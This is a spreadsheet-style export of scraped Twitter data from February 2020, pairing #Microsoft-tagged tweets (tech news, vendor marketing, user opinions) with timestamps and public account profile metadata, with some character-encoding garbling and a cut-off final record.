    <t>{'id': 1021232311159934976, 'id_str': '1021232311159934976', 'name': 'Abambres M, PhD', 'screen_name': 'AbambresM', 'location': 'Everywhere', 'description': '#Academia\n#RevisiÃ³nPorPares\n#FactorImpacto\n#EvaluaciÃ³nCientÃ­fica\n#PeerReview\n#ImpactFactor\n#ResearchAssessment\n\n#Blockchain\n#P2P\n#dApps\n#Decentralized\n#LBRY', 'url': 'https://t.co/gANNiWwLer', 'entities': {'url': {'urls': [{'url': 'https://t.co/gANNiWwLer', 'expanded_url': 'https://lbry.tv/$/invite/@amgg:2', 'display_url': 'lbry.tv/$/invite/@amggâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 203, 'friends_count': 7, 'listed_count': 3, 'created_at': 'Mon Jul 23 03:15:31 +0000 2018', 'favourites_count': 5996, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4342,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'http://pbs.twimg.com/profile_images/1157102297588981760/8_8h3T3n_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1157102297588981760/8_8h3T3n_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1021232311159934976/1581480283',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</si>
  <si>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13:36:08 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft: Google Chrome's fear of Microsoft Edge is revealing its bad side https://t.co/nQk8oaIdQO $MSFT #Microsoft #Technology #Tech #MSFT #digitaltransformation https://t.co/LYikDQDhsA</t>
  </si>
  <si>
    <t>Wed Feb 26 13:35:05 +0000 2020</t>
  </si>
  <si>
    <t>#Samsung and #Microsoft are partnering for #cloud #gaming. https://t.co/PgwfTXXYK0</t>
  </si>
  <si>
    <t>{'id': 35203319, 'id_str': '35203319', 'name': 'Evan Kirstel', 'screen_name': 'evankirstel', 'location': 'Boston, MA', 'description': '#B2B #Analyst #Influencer helping #Enterprise #Tech clients w/ #SocialMedia #Marketing. See you at #EC20 #HIMSS20 #SXSW  #HPEdiscover! #Cloud #IoT #5G', 'url': 'https://t.co/qEToVUzSTc', 'entities': {'url': {'urls': [{'url': 'https://t.co/qEToVUzSTc', 'expanded_url': 'http://linkedin.com/in/evankirstel', 'display_url': 'linkedin.com/in/evankirstel', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 281352, 'friends_count': 265515, 'listed_count': 13810, 'created_at': 'Sat Apr 25 12:45:16 +0000 2009', 'favourites_count': 564636, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 901565,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'http://pbs.twimg.com/profile_images/1230662097534627840/dSu01e7x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230662097534627840/dSu01e7x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35203319/1583164034',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</si>
  <si>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13:34:06 +0000 2020</t>
  </si>
  <si>
    <t>Admins beware! #Microsoft gives heads-up for 'disruptive' changes to authentication in Office 365 email service https://t.co/DXREBXCP8M via @Hybrid_Circle #Cloud #HPE https://t.co/phFNtdjygq</t>
  </si>
  <si>
    <t>Wed Feb 26 13:31:34 +0000 2020</t>
  </si>
  <si>
    <t>The underlying trend is to the upside #Microsoft #Stock #MarketScreener https://t.co/Qs5yWG0ZqI https://t.co/6z43d7AKxo</t>
  </si>
  <si>
    <t>Wed Feb 26 13:30:58 +0000 2020</t>
  </si>
  <si>
    <t>We love #SharePoint! Perhaps you feel differently? Check out our guide here - you can become a lover of the platform too! https://t.co/O0Yyufx2gY 
#SharePointHelp #Office365 #Office365Help #Microsoft https://t.co/GiGMaUmz1n</t>
  </si>
  <si>
    <t>Wed Feb 26 13:30:35 +0000 2020</t>
  </si>
  <si>
    <t>#Windowd 10 could get a new start menu as #Microsoft kills off one of its most useless features
https://t.co/KWYicSs2XL</t>
  </si>
  <si>
    <t>{'id': 3046230308, 'id_str': '3046230308', 'name': 'Dunblue Ltd', 'screen_name': 'Dunblue', 'location': 'Ipswich, Suffolk', 'description': 'Dunblue offers technology solutions for UK businesses; from supply, installation, maintenance &amp; support of IT systems to both landline &amp; mobile comms #ITsupport', 'url': 'http://t.co/fUWUvmm8Of', 'entities': {'url': {'urls': [{'url': 'http://t.co/fUWUvmm8Of', 'expanded_url': 'http://www.dunblue.com', 'display_url': 'dunblue.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 417, 'friends_count': 1126, 'listed_count': 12, 'created_at': 'Fri Feb 27 11:05:15 +0000 2015', 'favourites_count': 326, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 312,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'http://pbs.twimg.com/profile_images/1226834281307234305/D3bS_3c6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226834281307234305/D3bS_3c6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3046230308/1581335186', 'profile_link_color': '5E82CB',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</si>
  <si>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13:30:11 +0000 2020</t>
  </si>
  <si>
    <t>Meet the new #Microsoft Edge: Your move, #Google https://t.co/ZQpHzr9tkY #TechJunkieNews https://t.co/9s3Q3Opp5c</t>
  </si>
  <si>
    <t>Wed Feb 26 13:30:10 +0000 2020</t>
  </si>
  <si>
    <t>Google Chrome's fear of Microsoft Edge is revealing its bad side : https://t.co/KrHDJMsKhU #Google #Microsoft #Chrome Comments: https://t.co/AuxOABA9Lu</t>
  </si>
  <si>
    <t>{'id': 702365900310253569, 'id_str': '702365900310253569', 'name': 'Hacker News', 'screen_name': 'hacker_news_hir', 'location': '', 'description': 'Facebook mirror page:  https://t.co/OXolU6Aphx', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/OXolU6Aphx', 'expanded_url': 'https://www.facebook.com/hn.hiren.news/', 'display_url': 'facebook.com/hn.hiren.news/', 'indices': [23, 46]}]}}, 'protected': False, 'followers_count': 310, 'friends_count': 0, 'listed_count': 434, 'created_at': 'Wed Feb 24 05:34:14 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 131563,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'http://pbs.twimg.com/profile_images/702366612574310401/2aGa7WKL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/702366612574310401/2aGa7WKL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/702365900310253569/1461211751',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</si>
  <si>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13:29:08 +0000 2020</t>
  </si>
  <si>
    <t>Wake up to new home interface on my #XboxOne and #hateit cant they just let people choose for themselves instead of forcing it upon everybody. #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 13:26:02 +0000 2020</t>
  </si>
  <si>
    <t>#AIforHealth is #Microsoft's $40M program pillar aimed at empowering researchers and organizations to address challenges in health. @VentureBeat #cdwsocial https://t.co/YIFdlaalmq</t>
  </si>
  <si>
    <t>Wed Feb 26 13:25:32 +0000 2020</t>
  </si>
  <si>
    <t>#MariaSharapova announces her #retirement after five #GrandSlam titles https://t.co/L2zpexP6CG via @MailOnline 
#bigdata 
#Artificialintelligence
#dataScience #dataScientist
#Tennis
#womeninsports #usa 
@Chidambara09 #linux #china #usa #google #youtube  
#RUSSiA #Microsoft #UK</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</si>
  <si>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927213,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</si>
  <si>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13:21:43 +0000 2020</t>
  </si>
  <si>
    <t>Check out how Kelly Roofing achieved a 508% ROI and 2.4-month payback period on their successful #MSDyn365 Business Central implementation!      #Microsoft #Technology #IT #BusinessAutomation https://t.co/TeswiDb3oo</t>
  </si>
  <si>
    <t>{'id': 37020969, 'id_str': '37020969', 'name': 'Withum Digital', 'screen_name': 'WithumDigital', 'location': 'Bethesda, MD', 'description': 'Digital Workplace solutions built on #Microsoft', 'url': 'https://t.co/Zg7aWyN2sD', 'entities': {'url': {'urls': [{'url': 'https://t.co/Zg7aWyN2sD', 'expanded_url': 'http://digital.withum.com', 'display_url': 'digital.withum.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1109, 'friends_count': 1934, 'listed_count': 102, 'created_at': 'Fri May 01 19:36:41 +0000 2009', 'favourites_count': 535, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2878, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E1A12F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1060980399608872960/_yt7Zh3z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1060980399608872960/_yt7Zh3z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/37020969/1547567116', 'profile_link_color': '1B95E0',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</si>
  <si>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Check out how Kelly Roofing achieved a 508% ROI and 2.4-month payback period on their successful #MSDyn365 Business Central implementation!      #Microsoft #Technology #IT #BusinessAutomation https://t.co/dIl0gTbu7s</t>
  </si>
  <si>
    <t>{'id': 24817386, 'id_str': '24817386', 'name': 'Daniel Cohen-Dumani', 'screen_name': 'dcohendumani', 'location': 'Bethesda, MD', 'description': 'Technologist, Geek, Father and Husband. Passionate about helping companies and individuals get more effective, productive. AI enthusiast', 'url': 'https://t.co/uMRsVQKGqN', 'entities': {'url': {'urls': [{'url': 'https://t.co/uMRsVQKGqN', 'expanded_url': 'http://digital.withum.com/blog', 'display_url': 'digital.withum.com/blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3775, 'friends_count': 4451, 'listed_count': 117, 'created_at': 'Tue Mar 17 01:50:08 +0000 2009', 'favourites_count': 152, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2108,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'http://pbs.twimg.com/profile_images/1121466450177347584/y7DEUuml_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121466450177347584/y7DEUuml_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24817386/1556213396',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</si>
  <si>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13:21:03 +0000 2020</t>
  </si>
  <si>
    <t>How a connected #Microsoft #Azure ecosystem helps Ignition Ai compete with blazing-fast real-time analytics and built-in #security. https://t.co/MtE0Ms5shy</t>
  </si>
  <si>
    <t>Wed Feb 26 13:20:02 +0000 2020</t>
  </si>
  <si>
    <t>#Modernize #applications to meet rapidly changing internal and external #business demands. #Microsoft #Azure #cloud enables #digital #transformation through faster development, Read more @ https://t.co/8Hhkhby0T1 #cto #tech #businesstransformation #ilinkDigital #ilinkdifference https://t.co/oyX8BpLczF</t>
  </si>
  <si>
    <t>Wed Feb 26 13:19:46 +0000 2020</t>
  </si>
  <si>
    <t>#Ransomware attacks strike more often than you think, and new variations pop up constantly. Get data protection tips from this blog and contact Net Universe for access to #Microsoft #Office365 advanced threat protection. https://t.co/CNCTP8jTkq</t>
  </si>
  <si>
    <t>#Ransomware attacks strike more often than you think, and new variations pop up constantly. Get data protection tips from this blog and contact Net Universe for access to #Microsoft #Office365 advanced threat protection. https://t.co/Auoubi0BkC</t>
  </si>
  <si>
    <t>Wed Feb 26 13:19:30 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact The Countess Group to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/PKISIHUIy1</t>
  </si>
  <si>
    <t>Wed Feb 26 13:19:23 +0000 2020</t>
  </si>
  <si>
    <t>"We're about empowering people in organizations all over the world to achieve more. In today's world, we want to use AI to achieve that," says Microsoft CEO Satya Nadella. Learn about the #Microsoft vision. https://t.co/6B9rkN7RJF</t>
  </si>
  <si>
    <t>Wed Feb 26 13:19:08 +0000 2020</t>
  </si>
  <si>
    <t>#Startup support and plenty of new #partner moves aim to make #IoT work https://t.co/dFlscOOEgS via @IoTNow_ #Apple #BlackBerry #Microsoft #Sigfox</t>
  </si>
  <si>
    <t>Wed Feb 26 13:18:21 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact OS-Cubed, Inc. to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/QvSJpYYsK6</t>
  </si>
  <si>
    <t>Wed Feb 26 13:18:01 +0000 2020</t>
  </si>
  <si>
    <t>#Modernize #applications to meet rapidly changing internal and external #business demands. #Microsoft #Azure #cloud enables #digital #transformation through faster development,Read more @ https://t.co/WWPGGLuNtC #cto #tech #businesstransformation #ilinksystems #ilinkdifference https://t.co/eTXKH9HhVf</t>
  </si>
  <si>
    <t>Wed Feb 26 13:17:52 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft Cloud and #Microsoft365, Virtace Inc. can help you assess and manage compliance risk, protect sensitive data and respond efficiently to data discovery requests. Subscribe now to stay informed! https://t.co/tjvPAJ1LUF</t>
  </si>
  <si>
    <t>With #Microsoft Cloud and #Microsoft365, Virtace Inc. can help you assess and manage compliance risk, protect sensitive data and respond efficiently to data discovery requests. Subscribe now to stay informed! https://t.co/fq1KMgcsaH</t>
  </si>
  <si>
    <t>Wed Feb 26 13:17:46 +0000 2020</t>
  </si>
  <si>
    <t>#Ransomware attacks strike more often than you think, and new variations pop up constantly. Get data protection tips from this blog and contact Ataira for access to #Microsoft #Office365 advanced threat protection. https://t.co/mY9IgTFEfQ</t>
  </si>
  <si>
    <t>Wed Feb 26 13:17:31 +0000 2020</t>
  </si>
  <si>
    <t>13-year-old girl Ludhiana girl impresses Microsoft CEO Satya Nadella. This is why https://t.co/QGayAlZz8z #microsoft</t>
  </si>
  <si>
    <t>{'id': 140229456, 'id_str': '140229456', 'name': 'Mark W', 'screen_name': 'UKCybernaut', 'location': 'Oxfordshire 51.5751, -1.1533', 'description': 'Retired Nurse,Cyber Explorer,Photographer,Thinker.Loving Life - Double Lung Transplant 4/10/2010. \r\nOrgan Donors Save lives! \r\nhttp://t.co/USFPrSz2', 'url': 'http://t.co/neADwPFHN8', 'entities': {'url': {'urls': [{'url': 'http://t.co/neADwPFHN8', 'expanded_url': 'http://takeabreathandsay99.blogspot.com', 'display_url': 'takeabreathandsay99.blogspot.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/USFPrSz2', 'expanded_url': 'http://about.me/markwitcher', 'display_url': 'about.me/markwitcher', 'indices': [127, 147]}]}}, 'protected': False, 'followers_count': 1387, 'friends_count': 1937, 'listed_count': 69, 'created_at': 'Tue May 04 23:42:55 +0000 2010', 'favourites_count': 86, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18219, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4B4B4B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/502933678813499392/aPwezL5h_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/502933678813499392/aPwezL5h_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/140229456/1473028689',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'regular'}</t>
  </si>
  <si>
    <t>Wed Feb 26 13:17:19 +0000 2020</t>
  </si>
  <si>
    <t>Institutions with paper-intensive tasks and onsite servers are especially prone to data loss and cyber attacks. Follow us to stay updated on how to protect your organization with #Microsoft. https://t.co/JXWg3JiOON</t>
  </si>
  <si>
    <t>Wed Feb 26 13:17:13 +0000 2020</t>
  </si>
  <si>
    <t>How has the role of a public employee evolved thanks to cloud technology? Watch this video to learn how #Microsoft is helping to empower social workers worldwide. https://t.co/WQ5bRMVu9o</t>
  </si>
  <si>
    <t>Wed Feb 26 13:16:51 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/aFVNUuAMch</t>
  </si>
  <si>
    <t>Wed Feb 26 13:15:49 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/hGMPzYhGSt</t>
  </si>
  <si>
    <t>Wed Feb 26 13:15:20 +0000 2020</t>
  </si>
  <si>
    <t>Build a data analytics solution with #Microsoft #PowerPlatform today and create the foundation for tomorrow's end-to-end data analytics. Subscribe now to see how. https://t.co/Yv8hVVN2ps</t>
  </si>
  <si>
    <t>Wed Feb 26 13:14:52 +0000 2020</t>
  </si>
  <si>
    <t>Looking for real opinions regarding #Microsoft #Surface Pro 7.
worth?</t>
  </si>
  <si>
    <t>{'id': 1092109079697342465, 'id_str': '1092109079697342465', 'name': 'David AKA Drivers', 'screen_name': 'DRios_es', 'location': '', 'description': 'Ex-HP (now HPE), Ex-VMware, now Nutanix EMEA Senior Consultant. Tweets are my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 60, 'friends_count': 182, 'listed_count': 0, 'created_at': 'Sun Feb 03 17:14:29 +0000 2019', 'favourites_count': 470, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 215, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234090985849749504/V72Xl-7R_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234090985849749504/V72Xl-7R_normal.jpg',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</si>
  <si>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13:14:40 +0000 2020</t>
  </si>
  <si>
    <t>Institutions with paper-intensive tasks and onsite servers are especially prone to data loss and cyber attacks. Follow us to stay updated on how to protect your organization with #Microsoft. https://t.co/w9lnF4t1Qu</t>
  </si>
  <si>
    <t>Wed Feb 26 13:14:13 +0000 2020</t>
  </si>
  <si>
    <t>88 percent of companies report that having a unified #DigitalWorkspace has saved them nearly $5 million over three years. Subscribe now to learn how you can save both time and money with #Microsoft. https://t.co/cjLv0FdMxz</t>
  </si>
  <si>
    <t>{'id': 773608291591151616, 'id_str': '773608291591151616', 'name': 'zBest Data Technologies, LLC', 'screen_name': 'zBestData', 'location': 'Durham, NC', 'description': 'Seeking partners interested in expanding their portfolio with technologies for Real Estate.  https://t.co/gDJo207FkR', 'url': 'https://t.co/Vs2JIEFB1v', 'entities': {'url': {'urls': [{'url': 'https://t.co/Vs2JIEFB1v', 'expanded_url': 'https://zbestdata.com', 'display_url': 'zbestdata.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/gDJo207FkR', 'expanded_url': 'https://partners.zbestdata.com', 'display_url': 'partners.zbestdata.com', 'indices': [93, 116]}]}}, 'protected': False, 'followers_count': 9, 'friends_count': 44, 'listed_count': 1, 'created_at': 'Wed Sep 07 19:46:04 +0000 2016', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 677,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'http://pbs.twimg.com/profile_images/994047826731520000/0wAuO_GS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/994047826731520000/0wAuO_GS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/773608291591151616/1568729407', 'profile_link_color': 'BF081F',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</si>
  <si>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13:13:22 +0000 2020</t>
  </si>
  <si>
    <t>When providing public services, #efficiency can make or break the public's trust in your organization. Subscribe now to learn how you can enable trust-building actions with #Microsoft. https://t.co/M5CTYTZVr2</t>
  </si>
  <si>
    <t>Wed Feb 26 13:13:20 +0000 2020</t>
  </si>
  <si>
    <t>Check out how Kelly Roofing achieved a 508% ROI and 2.4-month payback period on their successful #MSDyn365 Business Central implementation!      #Microsoft #Technology #IT #BusinessAutomation https://t.co/RFVmaDKAs3</t>
  </si>
  <si>
    <t>Wed Feb 26 13:13:04 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/fISif3oOi1</t>
  </si>
  <si>
    <t>Wed Feb 26 13:12:26 +0000 2020</t>
  </si>
  <si>
    <t>From mobility apps to #Office365 productivity tools to collaboration apps to #PowerBI analytics, #Microsoft #Teams delivers everything you need to keep schedules and projects all in one place. https://t.co/yUdDiRMN5O</t>
  </si>
  <si>
    <t>Wed Feb 26 13:11:29 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #Azure #microsoft         VIA @mscloud    How to rebuild an app with cloud-native solutions (video)  https://t.co/UOLDTYM6sW</t>
  </si>
  <si>
    <t>Wed Feb 26 13:10:03 +0000 2020</t>
  </si>
  <si>
    <t>Former Microsoft engineer convicted of 18 felonies for digital currency fraud scam https://t.co/SDT0N1zcLL #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 13:09:38 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft #Dynamics365 can help elevate and transform your customers' journey by creating consistent, personalized experiences. Subscribe today. https://t.co/nYLFfaO5F3</t>
  </si>
  <si>
    <t>{'id': 516843373, 'id_str': '516843373', 'name': 'Complete Business', 'screen_name': 'ComBusSol', 'location': 'Boca Raton, FL ', 'description': 'Providing Microsoft-based ERP and CRM business and accounting software solutions, services and support for businesses in Florida for over 30 years.', 'url': 'http://t.co/F5SMNfKjKE', 'entities': {'url': {'urls': [{'url': 'http://t.co/F5SMNfKjKE', 'expanded_url': 'http://www.combussol.com', 'display_url': 'combussol.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 95, 'friends_count': 110, 'listed_count': 14, 'created_at': 'Tue Mar 06 20:07:12 +0000 2012', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 659, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D4D3DB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/560905817474347009/c6YEa760_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/560905817474347009/c6YEa760_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/516843373/1401903137', 'profile_link_color': '262262', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'C0DFEC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 13:09:34 +0000 2020</t>
  </si>
  <si>
    <t>@IWG_plc is now leading the #workspace revolution.
#BIIWorld proudly announces them as their #SilverSponsor at the #FutureWorktech Forum 2020 on 16-17 April, 2020 at @InterConKL, Malaysia.
Join Us: https://t.co/TAWIWFfSkM
#microsoft #futureworktechnology #workspace #mlearning https://t.co/39zYkU6VxY</t>
  </si>
  <si>
    <t>{'id': 986143981955252224, 'id_str': '986143981955252224', 'name': 'BII World', 'screen_name': 'biiworld', 'location': 'Alberta, Canada', 'description': 'We are a premium global #conferences and #training provider, leading top-notch corporate #events across a wide range of industries.', 'url': 'https://t.co/0H1lVDgPnN', 'entities': {'url': {'urls': [{'url': 'https://t.co/0H1lVDgPnN', 'expanded_url': 'https://www.biiworld.com/', 'display_url': 'biiworld.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 150, 'listed_count': 1, 'created_at': 'Tue Apr 17 07:27:01 +0000 2018', 'favourites_count': 96, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 331,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'http://pbs.twimg.com/profile_images/1219984622680854530/PGHwLbjk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219984622680854530/PGHwLbjk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/986143981955252224/1579493382',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</si>
  <si>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13:09:24 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact EMC-23 INC to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/S6QF2qA5eQ</t>
  </si>
  <si>
    <t>Wed Feb 26 13:09:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #AzureIoT can place your business in the handsand mindsof your clients. Subscribe now to CAL Business Solutions, Inc. and learn more. https://t.co/M6x13M8Fbo</t>
  </si>
  <si>
    <t>{'id': 29240585, 'id_str': '29240585', 'name': 'CAL Business ERP', 'screen_name': 'CALerpNEWS', 'location': 'Connecticut', 'description': 'Friendly New England based team of Microsoft Dynamics GP #MSDYNGP &amp; #Acumatica experts talking about #ERP/ Accounting Software. https://t.co/5evBUjhyp9', 'url': 'https://t.co/vgBXLs93Fz', 'entities': {'url': {'urls': [{'url': 'https://t.co/vgBXLs93Fz', 'expanded_url': 'http://www.calszone.com', 'display_url': 'calszone.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/5evBUjhyp9', 'expanded_url': 'http://www.calszone.com/blog', 'display_url': 'calszone.com/blog', 'indices': [128, 151]}]}}, 'protected': False, 'followers_count': 2536, 'friends_count': 1908, 'listed_count': 85, 'created_at': 'Mon Apr 06 16:59:17 +0000 2009', 'favourites_count': 137, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9672, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '022330', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1255244389/CAL_Square_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1255244389/CAL_Square_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29240585/1483475698', 'profile_link_color': '0084B4',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</si>
  <si>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Wed Feb 26 13:09:08 +0000 2020</t>
  </si>
  <si>
    <t>To receive updates from Online Computers on our infrastructure modernization solutions and #Microsoft #Azure services, subscribe now! https://t.co/4vFTtA6WyI</t>
  </si>
  <si>
    <t>Wed Feb 26 13:07:26 +0000 2020</t>
  </si>
  <si>
    <t>When you do something right, your employees let you know. Here's what NQCranes heard from administrators, technicians, &amp;amp; managers when they migrated to a #Microsoft cloud-based #ERP system. Watch now. #Technology #IT #BusinessAutomation https://t.co/3DK7fhSfTQ</t>
  </si>
  <si>
    <t>Wed Feb 26 13:06:57 +0000 2020</t>
  </si>
  <si>
    <t>satisfont : Microsoft Office Home and Business 2019 Download 1 Person Compatible on Windows 10 and Apple macOS: https://t.co/JBtu3X5R19
#Microsoft #Windows #Windows10pro #Microsoftoffice #Amazon #shopify #eBay #shopping</t>
  </si>
  <si>
    <t>{'id': 1030959660994580487, 'id_str': '1030959660994580487', 'name': 'ðŸŒŸðŸŒŸðŸŒŸAMIRAðŸŒŸðŸŒŸðŸŒŸ', 'screen_name': 'samiraa33842198', 'location': 'Etats-Unis', 'description': '\u200f\u200fhttps://t.co/m2Zo0MDctr\u200e\u200e\n\nðŸŒ·ðŸŒ¸ðŸŒ·ðŸŒ¸ðŸŒ·ðŸŒ¸ ðŸŒ· ðŸŒ¸ðŸŒ·ðŸŒ¸ ðŸŒ·ðŸŒ¸ðŸŒ·ðŸŒ´ðŸŒ·ðŸŒ´ðŸŒ·ðŸŒ´ðŸŒ·ðŸŒ´ðŸŒ·\n \nhttps://t.co/Z8Nwvgy1EE\n\nðŸŒ´ðŸŒ´ðŸŒ´ðŸŒ´ðŸŒ´ðŸŒ´ðŸŒ´\nhttps://t.co/oqzSY6nIQ4', 'url': 'https://t.co/h1rHyw3FLy', 'entities': {'url': {'urls': [{'url': 'https://t.co/h1rHyw3FLy', 'expanded_url': 'https://satisfont.blogspot.com', 'display_url': 'satisfont.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/m2Zo0MDctr', 'expanded_url': 'http://satisfont.blogspot.com', 'display_url': 'satisfont.blogspot.com', 'indices': [2, 25]}, {'url': 'https://t.co/Z8Nwvgy1EE', 'expanded_url': 'http://bit.ly/2YnpRZ0', 'display_url': 'bit.ly/2YnpRZ0', 'indices': [56, 79]}, {'url': 'https://t.co/oqzSY6nIQ4', 'expanded_url': 'http://weheartit.com/safi68', 'display_url': 'weheartit.com/safi68', 'indices': [89, 112]}]}}, 'protected': False, 'followers_count': 991, 'friends_count': 2583, 'listed_count': 1, 'created_at': 'Sat Aug 18 23:28:32 +0000 2018', 'favourites_count': 2710, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3162, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1052252447081680902/ziZ6FkrW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1052252447081680902/ziZ6FkrW_normal.jpg', 'profile_banner_url': 